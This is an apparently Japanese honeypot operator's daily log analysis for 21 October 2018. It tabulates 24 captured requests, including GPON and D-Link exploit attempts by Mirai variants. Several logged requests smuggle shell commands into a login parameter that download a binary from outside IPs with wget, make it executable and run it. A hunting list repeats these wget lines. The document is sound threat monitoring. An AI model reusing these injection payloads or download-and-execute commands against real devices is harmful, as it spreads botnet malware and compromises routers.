ハニーポットのログ分析(2018/10/21)
WOWhoneypotの2018/10/21(運用138日目)の簡易分析です。
本日の総アクセス件数は 24件です。また少ないです。
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
19 | 2018-10-21 | アクセス | GET / |
1 | 2018-10-21 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /gpon80Form/diag_Form?images/ |
1 | 2018-10-21 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
1 | 2018-10-21 | D-Linkを狙うMirai亜種の攻撃 | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://128.199.251.119/t.php%27$ |
1 | 2018-10-21 | D-Linkを狙うMirai亜種の攻撃 | GET /login.cgi?cli=aa%20aa%27;cd%20/tmp;wget%20hxxp://178.128.11.199/qtx.mips;chmod%20777%20qtx.mips;./qtx.mips%20dlink%20%27$ |
1 | 2018-10-21 | phpのWebShell設置の調査 | GET /images.php |
本日のドメイン名でのアクセスはありません。
本日のハンティングログは以下です。全てMirai亜種で検知したものです。
1 2018-10-21 wget+hxxp://93.95.100[.]165/b
1 2018-10-21 wget hxxp://178.128.11[.]199/qtx.mips
1 2018-10-21 wget hxxp://128.199.251[.]119/t.php
以上です。